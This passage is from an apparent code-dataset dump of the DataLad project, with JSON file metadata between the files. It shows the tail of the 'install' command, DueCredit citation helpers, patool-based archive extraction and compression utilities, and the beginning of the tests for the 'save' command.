Optional recursion into\n potential subdatasets, and download of all referenced data is supported.\n The new dataset(s) can be optionally registered in an existing\n :term:`superdataset` by identifying it via the `dataset` argument (the new\n dataset's path needs to be located within the superdataset for that).\n\n || REFLOW >>\n If no explicit [CMD: -s|--source CMD][PY: `source` PY] option is specified,\n then all positional URL-OR-PATH\n arguments are considered to be \"sources\" if they are URLs or target locations\n if they are paths.\n If a target location path corresponds to a submodule, the source location for it\n is figured out from its record in the `.gitmodules`.\n If [CMD: -s|--source CMD][PY: `source` PY] is specified, then a single optional\n positional PATH would be taken as the destination path for that dataset.\n << REFLOW ||\n\n It is possible to provide a brief description to label the dataset's\n nature *and* location, e.g. \"Michael's music on black laptop\". This helps\n humans to identify data locations in distributed scenarios. By default an\n identifier comprised of user and machine name, plus path will be generated.\n\n When only partial dataset content shall be obtained, it is recommended to\n use this command without the `get-data` flag, followed by a\n :func:`~datalad.api.get` operation to obtain the desired data.\n\n .. note::\n Power-user info: This command uses :command:`git clone`, and\n :command:`git annex init` to prepare the dataset. Registering to a\n superdataset is performed via a :command:`git submodule add` operation\n in the discovered superdataset.\n \"\"\"\n\n # very frequently this command will yield exactly one installed dataset\n # spare people the pain of going through a list by default\n return_type = 'item-or-list'\n # as discussed in #1409 and #1470, we want to return dataset instances\n # matching what is actually available after command completion (and\n # None for any failed dataset installation)\n # TODO actually need success(containing)dataset-or-none\n result_xfm = 'successdatasets-or-none'\n # we also want to limit the returned result to explicit input arguments\n # (paths/source) and not report any implicit action, like intermediate\n # datasets\n result_filter = is_result_matching_pathsource_argument\n\n _examples_ = [\n dict(text=\"Install a dataset from GitHub into the current directory\",\n code_py=\"install(\"\n \"source='https://github.com/datalad-datasets/longnow\"\n \"-podcasts.git')\",\n code_cmd=\"datalad install \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install a dataset as a subdataset into the current dataset\",\n code_py=\"\"\"\\\n install(dataset='.',\n source='https://github.com/datalad-datasets/longnow-podcasts.git')\"\"\",\n code_cmd=\"\"\"\\\n datalad install -d . 
\\\\\n --source='https://github.com/datalad-datasets/longnow-podcasts.git'\"\"\"),\n dict(text=\"Install a dataset into 'podcasts' (not 'longnow-podcasts') directory,\"\n \" and get all content right away\",\n code_py=\"\"\"\\\n install(path='podcasts',\n source='https://github.com/datalad-datasets/longnow-podcasts.git',\n get_data=True)\"\"\",\n code_cmd=\"\"\"\\\n datalad install --get-data \\\\\n -s https://github.com/datalad-datasets/longnow-podcasts.git podcasts\"\"\"),\n dict(text=\"Install a dataset with all its subdatasets\",\n code_py=\"\"\"\\\n install(source='https://github.com/datalad-datasets/longnow-podcasts.git',\n recursive=True)\"\"\",\n code_cmd=\"\"\"\\\n datalad install -r \\\\\n https://github.com/datalad-datasets/longnow-podcasts.git\"\"\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n # TODO: this probably changes to install into the dataset (add_to_super)\n # and to install the thing 'just there' without operating 'on' a dataset.\n # Adapt doc.\n # MIH: `shouldn't this be the job of `add`?\n doc=\"\"\"specify the dataset to perform the install operation on. If\n no dataset is given, an attempt is made to identify the dataset\n in a parent directory of the current working directory and/or the\n `path` given\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar='URL-OR-PATH',\n nargs=\"*\",\n # doc: TODO\n doc=\"\"\"path/name of the installation target. If no `path` is\n provided a destination path will be derived from a source URL\n similar to :command:`git clone`\"\"\"),\n source=Parameter(\n args=(\"-s\", \"--source\"),\n metavar='URL-OR-PATH',\n doc=\"URL or local path of the installation source\",\n constraints=EnsureStr() | EnsureNone()),\n branch=Parameter(\n args=(\"--branch\",),\n doc=\"\"\"Clone source at this branch or tag. This option applies only\n to the top-level dataset not any subdatasets that may be cloned\n when installing recursively. Note that if the source is a RIA URL\n with a version, it takes precedence over this option.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n get_data=Parameter(\n args=(\"-g\", \"--get-data\",),\n doc=\"\"\"if given, obtain all data content too\"\"\",\n action=\"store_true\"),\n description=location_description,\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n reckless=reckless_opt,\n jobs=jobs_opt,\n )\n\n @staticmethod\n @datasetmethod(name='install')\n @eval_results\n def __call__(\n path=None,\n *,\n source=None,\n dataset=None,\n get_data=False,\n description=None,\n recursive=False,\n recursion_limit=None,\n reckless=None,\n jobs=\"auto\",\n branch=None):\n\n # normalize path argument to be equal when called from cmdline and\n # python and nothing was passed into `path`\n path = ensure_list(path)\n\n if not source and not path:\n raise InsufficientArgumentsError(\n \"Please provide at least a source or a path\")\n\n # Common kwargs to pass to underlying git/install calls.\n # They might need adjustments (e.g. 
for recursion_limit, but\n # otherwise would be applicable throughout\n #\n # There should have been more of common options!\n # since underneath get could do similar installs\n common_kwargs = dict(\n get_data=get_data,\n recursive=recursive,\n recursion_limit=recursion_limit,\n # git_opts=git_opts,\n # annex_opts=annex_opts,\n reckless=reckless,\n jobs=jobs,\n )\n\n # did we explicitly get a dataset to install into?\n # if we got a dataset, path will be resolved against it.\n # Otherwise path will be resolved first.\n ds = None\n if dataset is not None:\n ds = require_dataset(dataset, check_installed=True,\n purpose='install')\n common_kwargs['dataset'] = dataset\n # pre-compute for results below\n refds_path = ds if ds is None else ds.path\n\n # switch into the two scenarios without --source:\n # 1. list of URLs\n # 2. list of (sub)dataset content\n if source is None:\n # we need to collect URLs and paths\n to_install = []\n to_get = []\n # TODO: this approach is problematic, it disrupts the order of input args.\n # consequently results will be returned in an unexpected order when a\n # mixture of source URL and paths is given. Reordering is only possible when\n # everything in here is fully processed before any results can be yielded.\n # moreover, I think the semantics of the status quo implementation are a\n # bit complicated: in a mixture list a source URL will lead to a new dataset\n # at a generated default location, but a path will lead to a subdataset\n # at that exact location\n for urlpath in path:\n ri = RI(urlpath)\n (to_get if isinstance(ri, PathRI) else to_install).append(urlpath)\n\n # 1. multiple source URLs\n for s in to_install:\n lgr.debug(\"Install passes into install source=%s\", s)\n for r in Install.__call__(\n source=s,\n description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled',\n result_xfm=None,\n result_filter=None,\n branch=branch,\n **common_kwargs):\n # no post-processing of the installed content on disk\n # should be necessary here, all done by code further\n # down that deals with an install from an actual `source`\n # any necessary fixes should go there too!\n r['refds'] = refds_path\n yield r\n\n # 2. one or more dataset content paths\n if to_get:\n lgr.debug(\"Install passes into get %d items\", len(to_get))\n # all commented out hint on inability to pass those options\n # into underlying install-related calls.\n # Also need to pass from get:\n # annex_get_opts\n\n for r in Get.__call__(\n to_get,\n # TODO should pass-through description, not sure why disabled\n # description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_xfm=None,\n result_renderer='disabled',\n result_filter=None,\n **common_kwargs):\n # no post-processing of get'ed content on disk should be\n # necessary here, this is the responsibility of `get`\n # (incl. 
adjusting parent's gitmodules when submodules end\n # up in an \"updated\" state (done in get helpers)\n # any required fixes should go there!\n r['refds'] = refds_path\n yield r\n\n # we are done here\n # the rest is about install from a `source`\n return\n\n # an actual `source` was given\n if source and path and len(path) > 1:\n # exception is ok here, if this fails it is either direct user error\n # or we fucked up one of our internal calls\n raise ValueError(\n \"install needs a single PATH when source is provided. \"\n \"Was given multiple PATHs: %s\" % str(path))\n\n # parameter constraints:\n if not source:\n # exception is ok here, if this fails it is either direct user error\n # or we fucked up one of our internal calls\n raise InsufficientArgumentsError(\n \"a `source` is required for installation\")\n\n # code below deals with a single path only\n path = path[0] if path else None\n\n if source == path:\n # even if they turn out to be identical after resolving symlinks\n # and more sophisticated witchcraft, it would still happily say\n # \"it appears to be already installed\", so we just catch an\n # obviously pointless input combination\n yield get_status_dict(\n 'install', path=path, status='impossible', logger=lgr,\n source_url=source, refds=refds_path,\n message=\"installation `source` and destination `path` are identical. \"\n \"If you are trying to add a subdataset simply use the `save` command\")\n return\n\n # resolve the target location (if local) against the provided dataset\n # or CWD:\n if path is not None:\n # MIH everything in here is highly similar to what common\n # interface helpers do (or should/could do), but at the same\n # is very much tailored to just apply to `install` -- I guess\n # it has to stay special\n\n # Should work out just fine for regular paths, so no additional\n # conditioning is necessary\n try:\n path_ri = RI(path)\n except Exception as e:\n ce = CapturedException(e)\n raise ValueError(\n \"invalid path argument {}: ({})\".format(path, ce))\n try:\n # Wouldn't work for SSHRI ATM, see TODO within SSHRI\n # yoh: path should be a local path, and mapping note within\n # SSHRI about mapping localhost:path to path is kinda\n # a peculiar use-case IMHO\n # TODO Stringification can be removed once PY35 is no longer\n # supported\n path = str(resolve_path(path_ri.localpath, dataset))\n # any `path` argument that point to something local now\n # resolved and is no longer a URL\n except ValueError:\n # `path` is neither a valid source nor a local path.\n # TODO: The only thing left is a known subdataset with a\n # name, that is not a path; Once we correctly distinguish\n # between path and name of a submodule, we need to consider\n # this.\n # For now: Just raise\n raise ValueError(\"Invalid path argument {0}\".format(path))\n # `path` resolved, if there was any.\n\n # clone dataset, will also take care of adding to superdataset, if one\n # is given\n res = Clone.__call__(\n source, path, dataset=ds, description=description,\n reckless=reckless,\n git_clone_opts=[\"--branch=\" + branch] if branch else None,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled',\n result_filter=None,\n on_failure='ignore')\n # helper\n as_ds = YieldDatasets()\n destination_dataset = None\n for r in res:\n if r['action'] == 'install' and r['type'] == 'dataset':\n # make sure logic below is 
valid, only one dataset result is\n # coming back\n assert(destination_dataset is None)\n destination_dataset = as_ds(r)\n r['refds'] = refds_path\n yield r\n assert(destination_dataset)\n\n # Now, recursive calls:\n if recursive or get_data:\n # dataset argument must not be passed inside since we use bound .get\n # It is ok to do \"inplace\" as long as we still return right\n # after the loop ends\n common_kwargs.pop('dataset', '')\n for r in destination_dataset.get(\n curdir,\n description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_xfm=None,\n result_renderer='disabled',\n **common_kwargs):\n r['refds'] = refds_path\n yield r\n # at this point no further post-processing should be necessary,\n # `clone` and `get` must have done that (incl. parent handling)\n # if not, bugs should be fixed in those commands\n return\n" }, { "alpha_fraction": 0.6307373046875, "alphanum_fraction": 0.6328141093254089, "avg_line_length": 38.79338836669922, "blob_id": "5dd87f1c9b6d2923f1120081012998e2c05c2245", "content_id": "a9d8cb5c6c65e68b5e9e8c5fff4668040bb80340", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4815, "license_type": "permissive", "max_line_length": 92, "num_lines": 121, "path": "/datalad/support/due_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nSupport functionality for using DueCredit\n\"\"\"\n\n# Note Text was added/exposed only since DueCredit 0.6.5\nfrom .due import due, Doi, Text\nfrom ..utils import never_fail, swallow_logs\nfrom datalad.support.exceptions import CapturedException\n\nimport logging\nlgr = logging.getLogger('datalad.duecredit')\n\n\n# Ad-hoc list of candidate metadata fields and corresponding\n# DueCredit entries. First hit will win it all.\n# In the future (TODO) extractors should provide API to provide\n# reference(s). Order of extractors from config should be preserved\n# and define precedence.\n# Citation Field(s), Description Field(s), Version Field(s), DueCredit Entry.\nCITATION_CANDIDATES = [\n ('bids.DatasetDOI', 'bids.name', None, Doi), # our best guess I guess\n ('bids.HowToAcknowledge', 'bids.name', None, Text),\n # ('bids.citation', Text), # non-standard!\n # ('bids.ReferencesAndLinks', list) # freeform but we could detect\n # # URLs, DOIs, and for the rest use Text\n # CRCNS style datacite\n ('datacite.sameas', ('datacite.shortdescription', 'datacite.description'),\n 'datacite.version', Doi),\n # ('frictionless_datapackage.?' 
# ?\n # ('frictionless_datapackage.homepage' # ?\n (None, None, None, None) # Catch all so we leave no one behind\n]\n\n\n# Not worth being a @datasetmethod at least in this shape.\n# Could in principle provide rendering of the citation(s) etc\n# using duecredit\n@never_fail # For paranoid Yarik\ndef duecredit_dataset(dataset):\n \"\"\"Duecredit cite a dataset if Duecredit is active\n\n ATM it is an ad-hoc implementation which largely just supports\n extraction of citation information from BIDS extractor\n (datalad-neuroimaging extension) only ATM.\n Generic implementation would require minor harmonization and/or\n support of extraction of relevant information by each extractor.\n \"\"\"\n\n try:\n # probably with metalad RFing we would gain better control\n # over reporting of warnings etc, ATM the warnings are produced\n # directly within get_ds_aggregate_db_locations down below and\n # we have no other way but pacify all of them.\n with swallow_logs(logging.ERROR) as cml:\n res = dataset.metadata(\n reporton='datasets', # Interested only in the dataset record\n result_renderer='disabled', # No need\n return_type='item-or-list' # Expecting a single record\n )\n except Exception as exc:\n lgr.debug(\n \"Failed to obtain metadata for %s. Will not provide duecredit entry: %s\",\n dataset, CapturedException(exc)\n )\n return\n\n if not isinstance(res, dict):\n lgr.debug(\"Got record which is not a dict, no duecredit for now\")\n return\n \n metadata = res.get('metadata', {})\n\n # Descend following the dots -- isn't there a helper already - TODO?\n def get_field(struct, field):\n if isinstance(field, (tuple, list)):\n first = lambda values: (el for el in values if el)\n return next(first(get_field(struct, f) for f in field), None)\n if not field:\n return None\n # I think it is better to be case insensitive\n field = field.lower()\n value = struct\n for subfield in field.split('.'):\n # lower case all the keys\n value = {k.lower(): v for k, v in value.items()}\n value = value.get(subfield, None)\n if not value:\n return None\n return value\n\n for cite_field, desc_field, version_field, cite_type in CITATION_CANDIDATES:\n cite_rec = get_field(metadata, cite_field)\n if cite_field is not None:\n if not cite_rec:\n continue\n # we found it! ;)\n else:\n # Catch all\n cite_rec = \"DataLad dataset at %s\" % dataset.path\n\n desc = get_field(metadata, desc_field) if desc_field else None\n desc = desc or \"DataLad dataset %s\" % dataset.id\n\n # DueCredit's path defines grouping of entries, so with\n # \"datalad.\" we bring them all under datalad's roof!\n # And as for unique suffix, there is no better one but the ID,\n # but that one is too long so let's take the first part of UUID\n path = \"datalad:%s\" % (dataset.id.split('-', 1)[0])\n\n version = get_field(metadata, version_field) if version_field else None\n version = version or dataset.repo.describe()\n\n due.cite(\n (cite_type or Text)(cite_rec),\n path=path,\n version=version,\n description=desc\n )\n return # we are done. TODO: should we continue? 
;)\n" }, { "alpha_fraction": 0.5887107253074646, "alphanum_fraction": 0.5940108895301819, "avg_line_length": 34.43192672729492, "blob_id": "537f996602d7f9c3160e5f57ead4911bef80fc6c", "content_id": "32d4738083a7d11e3d3fd63a1e35ec7d7278b57a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7547, "license_type": "permissive", "max_line_length": 90, "num_lines": 213, "path": "/datalad/support/archive_utils_patool.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"patool based implementation for datalad.support.archives utilities\"\"\"\n\nimport patoolib\nfrom .external_versions import external_versions\n# There were issues, so let's stay consistently with recent version\nassert(external_versions[\"patoolib\"] >= \"1.7\")\n\nimport os\nfrom .exceptions import MissingExternalDependency\nfrom .path import (\n basename,\n join as opj,\n)\n\nfrom datalad.utils import (\n ensure_bytes,\n chpwd,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.support.archive_utils_patool')\n\n# Monkey-patch patoolib's logging, so it logs coherently with the rest of\n# datalad\nimport patoolib.util\n#\n# Seems have managed with swallow_outputs\n#\n# def _patool_log(level, msg):\n# lgr.log(level, \"patool: %s\", msg)\n#\n# def _patool_log_info(msg, *args, **kwargs):\n# _patool_log(logging.DEBUG, msg)\n#\n# def _patool_log_error(msg, *args, **kwargs):\n# _patool_log(logging.ERROR, msg)\n#\n# patoolib.util.log_info = _patool_log_info\n# patoolib.util.log_error = _patool_log_error\n# patoolib.util.log_internal_error = _patool_log_error\n\n# we need to decorate patool.util.run\n# because otherwise it just lets processes to spit out everything to std and we\n# do want to use it at \"verbosity>=0\" so we could get idea on what is going on.\n# And I don't want to mock for every invocation\nfrom ..support.exceptions import CommandError\nfrom ..utils import swallow_outputs\nfrom datalad.cmd import (\n WitlessRunner,\n StdOutErrCapture,\n)\nfrom ..utils import ensure_unicode\n\nfrom ..utils import on_windows\n\n_runner = WitlessRunner()\n\n\ndef _patool_run(cmd, verbosity=0, **kwargs):\n \"\"\"Decorated runner for patool so it doesn't spit out outputs to stdout\"\"\"\n # use our runner\n try:\n # kwargs_ = kwargs[:]; kwargs_['shell'] = True\n # Any debug/progress output could be spit out to stderr so let's\n # \"expect\" it.\n #\n if isinstance(cmd, (list, tuple)) and kwargs.pop('shell', None):\n # patool (as far as I see it) takes care about quoting args\n cmd = ' '.join(cmd)\n out = _runner.run(\n cmd,\n protocol=StdOutErrCapture,\n **kwargs)\n lgr.debug(\"Finished running for patool. 
stdout=%s, stderr=%s\",\n out['stdout'], out['stderr'])\n return 0\n except CommandError as e:\n return e.code\n except Exception as e:\n lgr.error(\"While invoking runner caught unexpected exception: %s\", e)\n return 100 # unknown beast\npatoolib.util.run = _patool_run\n\n\n# yoh: only keys are used atm, logic in decompress_file is replaced to use\n# patool\n\nDECOMPRESSORS = {\n r'\\.(tar\\.bz|tbz)$': 'tar -xjvf %(file)s -C %(dir)s',\n r'\\.(tar\\.xz)$': 'tar -xJvf %(file)s -C %(dir)s',\n r'\\.(tar\\.gz|tgz)$': 'tar -xzvf %(file)s -C %(dir)s',\n r'\\.(zip)$': 'unzip %(file)s -d %(dir)s',\n}\n\n\ndef unixify_path(path):\n r\"\"\"On windows convert paths from drive:\\d\\file to /drive/d/file\n\n This overcomes problems with various cmdline tools we are to use,\n such as tar etc\n \"\"\"\n if on_windows:\n drive, path_ = os.path.splitdrive(path)\n path_ = path_.split(os.sep)\n path_ = '/'.join(path_)\n if drive:\n # last one must be :\n assert(drive[-1] == \":\")\n return '/%s%s' % (drive[:-1], path_)\n else:\n return path_\n else:\n return path\n\n\ndef decompress_file(archive, dir_):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n Parameters\n ----------\n archive: str\n dir_: str\n \"\"\"\n with swallow_outputs() as cmo:\n archive = ensure_bytes(archive)\n dir_ = ensure_bytes(dir_)\n patoolib.util.check_existing_filename(archive)\n patoolib.util.check_existing_filename(dir_, onlyfiles=False)\n # Call protected one to avoid the checks on existence on unixified path\n outdir = unixify_path(dir_)\n # should be supplied in PY3 to avoid b''\n outdir = ensure_unicode(outdir)\n archive = ensure_unicode(archive)\n\n format_compression = patoolib.get_archive_format(archive)\n if format_compression == ('gzip', None):\n # Yarik fell into the trap of being lazy and not providing proper\n # support for .gz .xz etc \"stream archivers\" formats in handling\n # of archives. ATM out support for .gz relies on behavior of 7z while\n # extracting them and respecting possibly present .gz filename\n # header field.\n # See more https://github.com/datalad/datalad/pull/3176#issuecomment-466819861\n # TODO: provide proper handling of all those archives without\n # relying on any filename been stored in the header\n program = patoolib.find_archive_program(\n format_compression[0], 'extract')\n if basename(program) != '7z':\n raise MissingExternalDependency(\n \"cmd:7z\",\n msg=\"(Not) Funny enough but ATM we need p7zip installation \"\n \"to handle .gz files extraction 'correctly'\"\n )\n\n patoolib._extract_archive(unixify_path(archive),\n outdir=outdir,\n verbosity=100)\n if cmo.out:\n lgr.debug(\"patool gave stdout:\\n%s\", cmo.out)\n if cmo.err:\n lgr.debug(\"patool gave stderr:\\n%s\", cmo.err)\n\n # Note: (ben) Experienced issue, where extracted tarball\n # lacked execution bit of directories, leading to not being\n # able to delete them while having write permission.\n # Can't imagine a situation, where we would want to fail on\n # that kind of mess. 
So, to be sure set it.\n\n if not on_windows:\n os.chmod(dir_,\n os.stat(dir_).st_mode |\n os.path.stat.S_IEXEC)\n for root, dirs, files in os.walk(dir_, followlinks=False):\n for d in dirs:\n subdir = opj(root, d)\n os.chmod(subdir,\n os.stat(subdir).st_mode |\n os.path.stat.S_IEXEC)\n\n\ndef compress_files(files, archive, path=None, overwrite=True):\n \"\"\"Compress `files` into an `archive` file\n\n Parameters\n ----------\n files : list of str\n archive : str\n path : str\n Alternative directory under which compressor will be invoked, to e.g.\n take into account relative paths of files and/or archive\n overwrite : bool\n Whether to allow overwriting the target archive file if one already exists\n \"\"\"\n with swallow_outputs() as cmo:\n with chpwd(path):\n if not overwrite:\n patoolib.util.check_new_filename(archive)\n patoolib.util.check_archive_filelist(files)\n # Call protected one to avoid the checks on existence on unixified path\n patoolib._create_archive(unixify_path(archive),\n [unixify_path(f) for f in files],\n verbosity=100)\n if cmo.out:\n lgr.debug(\"patool gave stdout:\\n%s\", cmo.out)\n if cmo.err:\n lgr.debug(\"patool gave stderr:\\n%s\", cmo.err)\n" }, { "alpha_fraction": 0.6181303858757019, "alphanum_fraction": 0.6250792145729065, "avg_line_length": 34.97719192504883, "blob_id": "9ddb39b604f5eda5ce916597c151169f84036e4c", "content_id": "ab1668ac445e34be598829318aab5a74aba5abdc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41014, "license_type": "permissive", "max_line_length": 216, "num_lines": 1140, "path": "/datalad/core/local/tests/test_save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test save command\"\"\"\n\nimport itertools\nimport logging\nimport os\nimport os.path as op\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad.api import (\n create,\n install,\n save,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n known_failure,\n known_failure_windows,\n maybe_adjust_repo,\n neq_,\n ok_,\n patch,\n skip_if_adjusted_branch,\n skip_wo_symlink_capability,\n swallow_logs,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n ensure_list,\n rmtree,\n)\n\ntree_arg = dict(tree={'test.txt': 'some',\n 'test_annex.txt': 'some annex',\n 'test1.dat': 'test file 1',\n 'test2.dat': 'test file 2',\n OBSCURE_FILENAME: 'blobert',\n 'dir': {'testindir': 'someother',\n OBSCURE_FILENAME: 'none'},\n 'dir2': {'testindir3': 'someother3'}})\n\n\n@with_tempfile()\ndef test_save(path=None):\n\n ds = Dataset(path).create(annex=False)\n\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"something\")\n\n ds.repo.add(\"new_file.tst\", git=True)\n ok_(ds.repo.dirty)\n\n ds.save(message=\"add a new file\")\n assert_repo_status(path, 
annex=isinstance(ds.repo, AnnexRepo))\n\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"modify\")\n\n ok_(ds.repo.dirty)\n ds.save(message=\"modified new_file.tst\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # save works without ds and files given in the PWD\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"rapunzel\")\n with chpwd(path):\n save(message=\"love rapunzel\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # and also without `-a` when things are staged\n with open(op.join(path, \"new_file.tst\"), \"w\") as f:\n f.write(\"exotic\")\n ds.repo.add(\"new_file.tst\", git=True)\n with chpwd(path):\n save(message=\"love marsians\")\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n files = ['one.txt', 'two.txt']\n for fn in files:\n with open(op.join(path, fn), \"w\") as f:\n f.write(fn)\n\n ds.save([op.join(path, f) for f in files])\n # superfluous call to save (alll saved it already), should not fail\n # but report that nothing was saved\n assert_status('notneeded', ds.save(message=\"set of new files\"))\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # create subdataset\n subds = ds.create('subds')\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n # modify subds\n with open(op.join(subds.path, \"some_file.tst\"), \"w\") as f:\n f.write(\"something\")\n subds.save()\n assert_repo_status(subds.path, annex=isinstance(subds.repo, AnnexRepo))\n # ensure modified subds is committed\n ds.save()\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n\n # now introduce a change downstairs\n subds.create('someotherds')\n assert_repo_status(subds.path, annex=isinstance(subds.repo, AnnexRepo))\n ok_(ds.repo.dirty)\n # and save via subdataset path\n ds.save('subds', version_tag='new_sub')\n assert_repo_status(path, annex=isinstance(ds.repo, AnnexRepo))\n tags = ds.repo.get_tags()\n ok_(len(tags) == 1)\n eq_(tags[0], dict(hexsha=ds.repo.get_hexsha(), name='new_sub'))\n # fails when retagged, like git does\n res = ds.save(version_tag='new_sub', on_failure='ignore')\n assert_status('error', res)\n assert_result_count(\n res, 1,\n action='save', type='dataset', path=ds.path,\n message=('cannot tag this version: %s',\n \"fatal: tag 'new_sub' already exists\"))\n\n\n@with_tempfile()\ndef test_save_message_file(path=None):\n ds = Dataset(path).create()\n with assert_raises(ValueError):\n ds.save(\"blah\", message=\"me\", message_file=\"and me\")\n\n create_tree(path, {\"foo\": \"x\",\n \"msg\": \"add foo\"})\n ds.repo.add(\"foo\")\n ds.save(message_file=op.join(ds.path, \"msg\"))\n # ATTN: Consider corresponding branch so that this check works when we're\n # on an adjusted branch too (e.g., when this test is executed under\n # Windows).\n eq_(ds.repo.format_commit(\"%s\", DEFAULT_BRANCH),\n \"add foo\")\n\n\n@with_tempfile()\ndef check_renamed_file(recursive, annex, path):\n ds = Dataset(path).create(annex=annex)\n create_tree(path, {'old': ''})\n ds.repo.add('old')\n ds.repo.call_git([\"mv\"], files=[\"old\", \"new\"])\n ds.save(recursive=recursive)\n assert_repo_status(path)\n\n # https://github.com/datalad/datalad/issues/6558\n new = (ds.pathobj / \"new\")\n new.unlink()\n new.mkdir()\n (new / \"file\").touch()\n ds.repo.call_git([\"add\"], files=[str(new / \"file\")])\n ds.save(recursive=recursive)\n assert_repo_status(path)\n\n\[email protected](\n \"recursive,annex\",\n itertools.product(\n (False, ), #, True TODO when implemented\n (True, 
False),\n )\n)\ndef test_renamed_file(recursive, annex):\n check_renamed_file(recursive, annex)\n\n\n@with_tempfile(mkdir=True)\ndef test_subdataset_save(path=None):\n parent = Dataset(path).create()\n sub = parent.create('sub')\n assert_repo_status(parent.path)\n create_tree(parent.path, {\n \"untracked\": 'ignore',\n 'sub': {\n \"new\": \"wanted\"}})\n sub.save('new')\n # defined state: one untracked, modified (but clean in itself) subdataset\n assert_repo_status(sub.path)\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n\n # `save sub` does not save the parent!!\n with chpwd(parent.path):\n assert_status('notneeded', save(dataset=sub.path))\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n # `save -u .` saves the state change in the subdataset,\n # but leaves any untracked content alone\n with chpwd(parent.path):\n assert_status('ok', parent.save(updated=True))\n assert_repo_status(parent.path, untracked=['untracked'])\n\n # get back to the original modified state and check that -S behaves in\n # exactly the same way\n create_tree(parent.path, {\n 'sub': {\n \"new2\": \"wanted2\"}})\n sub.save('new2')\n assert_repo_status(parent.path, untracked=['untracked'], modified=['sub'])\n\n # https://github.com/datalad/datalad/issues/6843\n # saving subds within super must not add 2nd copy of the submodule within .gitmodules\n with chpwd(sub.path):\n # op.sep is critical to trigger saving within (although should not\n # be relevant sice no changes within sub)\n res = save(dataset=\"^\", path=sub.path + op.sep)\n assert_repo_status(parent.path, untracked=['untracked'])\n git_modules = (parent.pathobj / \".gitmodules\")\n # there was nothing to do for .gitmodules\n # TODO: enable assert_result_count(res, 0, path=str(git_modules))\n # more thorough test that it also was not modified.\n # ensure that .gitmodules does not have duplicate entries\n submodules = [\n l.strip()\n for l in git_modules.read_text().splitlines()\n if l.strip().split(' ', 1)[0] == '[submodule'\n ]\n assert len(submodules) == 1\n\n\n@with_tempfile(mkdir=True)\ndef test_subsuperdataset_save(path=None):\n # Verify that when invoked without recursion save does not\n # cause querying of subdatasets of the subdataset\n # see https://github.com/datalad/datalad/issues/4523\n parent = Dataset(path).create()\n # Create 3 levels of subdatasets so later to check operation\n # with or without --dataset being specified\n sub1 = parent.create('sub1')\n sub2 = parent.create(sub1.pathobj / 'sub2')\n sub3 = parent.create(sub2.pathobj / 'sub3')\n assert_repo_status(path)\n # now we will lobotomize that sub3 so git would fail if any query is performed.\n (sub3.pathobj / '.git' / 'config').chmod(0o000)\n try:\n sub3.repo.call_git(['ls-files'], read_only=True)\n raise SkipTest\n except CommandError:\n # desired outcome\n pass\n # the call should proceed fine since neither should care about sub3\n # default is no recursion\n 